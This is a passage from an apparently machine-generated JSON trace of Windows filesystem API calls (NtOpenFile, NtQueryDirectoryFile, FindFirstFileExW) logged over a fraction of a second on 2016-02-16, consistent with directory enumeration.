"NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": 
"FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", 
"api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", 
"api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": 
